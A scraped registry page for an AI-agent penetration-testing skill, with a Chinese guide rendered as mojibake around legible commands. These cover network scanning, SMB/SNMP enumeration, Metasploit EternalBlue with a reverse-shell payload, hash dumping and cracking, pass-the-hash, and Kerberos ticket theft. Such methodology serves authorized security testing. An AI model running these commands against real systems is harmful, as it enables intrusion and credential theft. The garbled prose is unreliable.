network-penetration-testing
10
总安装量
3
周安装量
#29147
全站排名
安装命令
npx skills add https://github.com/ed1s0nz/cyberstrikeai --skill network-penetration-testing
Agent 安装分布
opencode
2
codex
2
amp
1
kimi-cli
1
github-copilot
1
claude-code
1
Skill 文档
ç½ç»æ¸éæµè¯
æ¦è¿°
ç½ç»æ¸éæµè¯æ¯è¯ä¼°ç½ç»åºç¡è®¾æ½å®å ¨æ§çéè¦ç¯èãæ¬æè½æä¾ç½ç»æ¸éæµè¯çæ¹æ³ãå·¥å ·åæä½³å®è·µã
æµè¯èå´
1. ä¿¡æ¯æ¶é
æ£æ¥é¡¹ç®ï¼
- ç½ç»ææ
- 主æºåç°
- ç«¯å£æ«æ
- æå¡è¯å«
2. æ¼æ´æ«æ
æ£æ¥é¡¹ç®ï¼
- ç³»ç»æ¼æ´
- æå¡æ¼æ´
- é ç½®é误
- å¼±å¯ç
3. æ¼æ´å©ç¨
æ£æ¥é¡¹ç®ï¼
- è¿ç¨ä»£ç æ§è¡
- æéæå
- 横åç§»å¨
- æä¹ å
ä¿¡æ¯æ¶é
ç½ç»æ«æ
使ç¨Nmapï¼
# 主æºåç°
nmap -sn 192.168.1.0/24
# ç«¯å£æ«æ
nmap -sS -p- 192.168.1.100
# æå¡è¯å«
nmap -sV -sC 192.168.1.100
# æä½ç³»ç»è¯å«
nmap -O 192.168.1.100
# 宿´æ«æ
nmap -sS -sV -sC -O -p- 192.168.1.100
使ç¨Masscanï¼
# å¿«éç«¯å£æ«æ
masscan -p1-65535 192.168.1.0/24 --rate=1000
æå¡æä¸¾
SMBæä¸¾ï¼
# æä¸¾SMBå
񄧮
smbclient -L //192.168.1.100 -N
# æä¸¾SMBç¨æ·
enum4linux -U 192.168.1.100
# 使ç¨nmapèæ¬
nmap --script smb-enum-shares,smb-enum-users 192.168.1.100
RPCæä¸¾ï¼
# æä¸¾RPCæå¡
rpcclient -U "" -N 192.168.1.100
# 使ç¨nmapèæ¬
nmap --script rpc-enum 192.168.1.100
SNMPæä¸¾ï¼
# SNMPæ«æ
snmpwalk -v2c -c public 192.168.1.100
# 使ç¨onesixtyone
onesixtyone -c wordlist.txt 192.168.1.0/24
æ¼æ´æ«æ
使ç¨Nessus
# å¯å¨Nessus
# 访é®Webçé¢
# åå»ºæ«æä»»å¡
# åææ«æç»æ
使ç¨OpenVAS
# å¯å¨OpenVAS
gvm-setup
# 访é®Webçé¢
# åå»ºæ«æä»»å¡
# åææ«æç»æ
使ç¨Nmapèæ¬
# æ¼æ´æ«æ
nmap --script vuln 192.168.1.100
# ç¹å®æ¼æ´æ«æ
nmap --script smb-vuln-ms17-010 192.168.1.100
# ææèæ¬
nmap --script all 192.168.1.100
æ¼æ´å©ç¨
Metasploit
åºç¡ä½¿ç¨ï¼
# å¯å¨Metasploit
msfconsole
# æç´¢æ¼æ´
search ms17-010
# ä½¿ç¨æ¨¡å
use exploit/windows/smb/ms17_010_eternalblue
# è®¾ç½®åæ°
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
# æ§è¡
exploit
忏éï¼
# è·åç³»ç»ä¿¡æ¯
sysinfo
# è·åæé
getsystem
# è¿ç§»è¿ç¨
migrate <pid>
# è·ååå¸
hashdump
# è·åå¯ç
run post/windows/gather/smart_hashdump
å¸¸è§æ¼æ´å©ç¨
EternalBlueï¼
# 使ç¨Metasploit
use exploit/windows/smb/ms17_010_eternalblue
# 使ç¨ç¬ç«å·¥å
·
python eternalblue.py 192.168.1.100
BlueKeepï¼
# 使ç¨Metasploit
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
SMBGhostï¼
# 使ç¨ç¬ç«å·¥å
·
python smbghost.py 192.168.1.100
横åç§»å¨
å¯ç ç ´è§£
使ç¨Hashcatï¼
# ç ´è§£NTLMåå¸
hashcat -m 1000 hashes.txt wordlist.txt
# ç ´è§£LMåå¸
hashcat -m 3000 hashes.txt wordlist.txt
# 使ç¨è§å
hashcat -m 1000 hashes.txt wordlist.txt -r rules/best64.rule
使ç¨Johnï¼
# ç ´è§£åå¸
john hashes.txt
# 使ç¨åå
¸
john --wordlist=wordlist.txt hashes.txt
# 使ç¨è§å
john --wordlist=wordlist.txt --rules hashes.txt
Pass-the-Hash
使ç¨Impacketï¼
# SMB Pass-the-Hash
python smbexec.py -hashes :<hash> domain/user@target
# WMI Pass-the-Hash
python wmiexec.py -hashes :<hash> domain/user@target
# RDP Pass-the-Hash
xfreerdp /u:user /pth:<hash> /v:target
票æ®ä¼ é
使ç¨Mimikatzï¼
# æå票æ®
sekurlsa::tickets /export
# 注å
¥ç¥¨æ®
kerberos::ptt ticket.kirbi
使ç¨Rubeusï¼
# 请æ±ç¥¨æ®
Rubeus.exe asktgt /user:user /domain:domain /rc4:hash
# 注å
¥ç¥¨æ®
Rubeus.exe ptt /ticket:ticket.kirbi
å·¥å ·ä½¿ç¨
Nmap
# 宿´æ«æ
nmap -sS -sV -sC -O -p- -T4 target
# éè½æ«æ
nmap -sS -T2 -f -D RND:10 target
# UDPæ«æ
nmap -sU -p- target
Metasploit
# å¯å¨æ¡æ¶
msfconsole
# æ°æ®åºåå§å
msfdb init
# 导å
¥æ«æç»æ
db_import nmap.xml
# æ¥ç主æº
hosts
# æ¥çæå¡
services
Burp Suite
ç½ç»æ«æï¼
- é 置代ç
- æµè§ç®æ ç½ç»
- åææµé
- 䏻卿«æ
æµè¯æ¸ å
ä¿¡æ¯æ¶é
- ç½ç»ææåç°
- 主æºåç°
- ç«¯å£æ«æ
- æå¡è¯å«
- æä½ç³»ç»è¯å«
æ¼æ´æ«æ
- ç³»ç»æ¼æ´æ«æ
- æå¡æ¼æ´æ«æ
- é ç½®éè¯¯æ£æ¥
- å¼±å¯ç æ£æ¥
æ¼æ´å©ç¨
- è¿ç¨ä»£ç æ§è¡
- æéæå
- 横åç§»å¨
- æä¹ å
常è§å®å ¨é®é¢
1. æªæè¡¥ä¸çç³»ç»
é®é¢ï¼
- ç³»ç»æªåæ¶æ´æ°
- åå¨å·²ç¥æ¼æ´
- è¡¥ä¸ç®¡çä¸å½
ä¿®å¤ï¼
- åæ¶å®è£ è¡¥ä¸
- 建ç«è¡¥ä¸ç®¡çæµç¨
- 宿å®å ¨æ´æ°
2. å¼±å¯ç
é®é¢ï¼
- é»è®¤å¯ç
- ç®åå¯ç
- å¯ç éç¨
ä¿®å¤ï¼
- 宿½å¼ºå¯ç çç¥
- å¯ç¨å¤å ç´ è®¤è¯
- å®ææ´æ¢å¯ç
3. 弿¾ç«¯å£
é®é¢ï¼
- ä¸å¿ è¦ç端å£å¼æ¾
- æå¡æ´é²
- é²ç«å¢é ç½®é误
ä¿®å¤ï¼
- å ³éä¸å¿ è¦ç«¯å£
- 宿½é²ç«å¢è§å
- 使ç¨VPN访é®
4. é ç½®é误
é®é¢ï¼
- é»è®¤é ç½®
- æéè¿å¤§
- æå¡é ç½®ä¸å½
ä¿®å¤ï¼
- å®å ¨é ç½®åºçº¿
- æå°æéåå
- 宿é 置审æ¥
æä½³å®è·µ
1. ä¿¡æ¯æ¶é
- å ¨é¢æ«æ
- å¤å·¥å ·éªè¯
- è®°å½åç°
- åæç»æ
2. æ¼æ´å©ç¨
- æææµè¯
- æå°å½±å
- è®°å½æä½
- åæ¶æ¸ ç
3. æ¥åç¼å
- 详ç»è®°å½
- é£é©è¯çº§
- ä¿®å¤å»ºè®®
- éªè¯æ¥éª¤
注æäºé¡¹
- ä» å¨ææç¯å¢ä¸è¿è¡æµè¯
- é¿å 对ç产系ç»é æå½±å
- éµå®æ³å¾æ³è§
- ä¿æ¤æµè¯æ°æ®